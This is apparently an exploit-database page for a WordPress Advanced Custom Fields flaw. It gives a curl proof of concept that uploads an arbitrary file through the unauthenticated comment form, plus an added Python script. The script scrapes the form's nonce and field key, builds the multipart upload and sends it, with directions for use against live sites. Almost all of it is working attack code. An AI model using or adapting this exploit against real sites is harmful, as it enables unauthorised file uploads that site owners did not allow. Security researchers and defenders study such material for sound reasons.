## https://sploitus.com/exploit?id=WPEX-ID:3FDE5336-552C-4861-8B4D-89A16735C0E2
The `_acf_nonce` value (together with `_acf_post_id` and the `acf[field_...]` key) is taken from the comment form rendered on the target's frontend; the request below carries no cookie or other credential.

```bash
# Proof-of-concept request from the page. The trailing backslash-space pairs in
# the original broke shell line continuation; they are plain backslashes here.
# _acf_nonce, _acf_post_id and the acf[field_...] key are target-specific and
# must be copied from the frontend comment form. The '@' prefix makes curl
# upload the local file rickroll.mp4 as the value of acf[name].
curl \
  -i -s -k -X 'POST' \
  -F "comment=Test comment" \
  -F '_acf_post_id=1' \
  -F '_acf_validation=1' \
  -F '_acf_nonce=ba2ef314e0' \
  -F '_acf_changed=0' \
  -F 'acf[field_62c8939d255d8]=Something' \
  -F 'author=testing' \
  -F 'email=testing@example.com' \
  -F 'url=' \
  -F 'submit=Post+Comment' \
  -F 'comment_post_ID=1' \
  -F 'comment_parent=0' \
  -F 'acf[name]=@rickroll.mp4' \
  'http://play.local/wp-comments-post.php'
```
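The two steps the page implies, reading the ACF hidden inputs out of the frontend form and then replaying the same multipart request, as an added Python example that is not part of the original page. The form markup below is constructed for the example: the input names are the ones used in the curl request, and the nonce, post id and field key values are copied from it. The multipart encoder is hand-rolled so the script runs offline with only the standard library; `post_form` is the only function that touches the network.

```python
import mimetypes
import re
import urllib.request
import uuid
from html.parser import HTMLParser

# Constructed sample of the frontend comment form (assumption: hidden inputs with
# the names seen in the curl request; values copied from it for illustration).
SAMPLE_FORM_HTML = """
<form action="http://play.local/wp-comments-post.php" method="post" id="commentform">
  <input type="hidden" name="_acf_post_id" value="1" />
  <input type="hidden" name="_acf_validation" value="1" />
  <input type="hidden" name="_acf_nonce" value="ba2ef314e0" />
  <input type="hidden" name="_acf_changed" value="0" />
  <div class="acf-field" data-key="field_62c8939d255d8">
    <input type="text" name="acf[field_62c8939d255d8]" value="" />
  </div>
  <textarea name="comment"></textarea>
  <input type="hidden" name="comment_post_ID" value="1" />
  <input type="hidden" name="comment_parent" value="0" />
</form>
"""

HIDDEN_NAMES = ("_acf_post_id", "_acf_validation", "_acf_nonce", "_acf_changed",
                "comment_post_ID", "comment_parent")


class _InputCollector(HTMLParser):
    """Collect name -> value for every <input>/<textarea> in the page."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag in ("input", "textarea"):
            a = dict(attrs)
            if a.get("name"):
                self.inputs[a["name"]] = a.get("value") or ""


def extract_acf_form(html):
    """Return (hidden values, list of acf[field_...] names) found in the form."""
    p = _InputCollector()
    p.feed(html)
    hidden = {k: v for k, v in p.inputs.items() if k in HIDDEN_NAMES}
    acf_fields = [k for k in p.inputs if re.fullmatch(r"acf\[field_[0-9a-f]+\]", k)]
    return hidden, acf_fields


def build_payload(hidden, acf_field, upload_name, upload_bytes,
                  comment="Test comment", author="testing", email="testing@example.com"):
    """Mirror the field set of the curl request: text fields plus one file part
    sent under acf[name], exactly as the page's request does."""
    fields = [("comment", comment)] + list(hidden.items()) + [
        (acf_field, "Something"),
        ("author", author),
        ("email", email),
        ("url", ""),
        ("submit", "Post Comment"),
    ]
    files = [("acf[name]", upload_name, upload_bytes)]
    return fields, files


def encode_multipart(fields, files):
    """Build a multipart/form-data body; returns (body bytes, Content-Type header)."""
    boundary = "----pyboundary" + uuid.uuid4().hex
    parts = []
    for name, value in fields:
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"", str(value).encode()]
    for name, filename, data in files:
        ctype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
                  f"Content-Type: {ctype}".encode(), b"", data]
    parts += [f"--{boundary}--".encode(), b""]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def post_form(url, body, content_type):
    """Send the encoded body to wp-comments-post.php (network; not run by default)."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    hidden, acf_fields = extract_acf_form(SAMPLE_FORM_HTML)
    fields, files = build_payload(hidden, acf_fields[0], "rickroll.mp4", b"\x00\x00\x00\x18ftyp")
    body, ctype = encode_multipart(fields, files)
    print("nonce:", hidden["_acf_nonce"], "field:", acf_fields[0], "body bytes:", len(body))
    # post_form("http://play.local/wp-comments-post.php", body, ctype)  # target from the page
```

Against a live target, fetch the post's page first, feed its HTML to `extract_acf_form`, and only then build the body, since the nonce and field key differ per site.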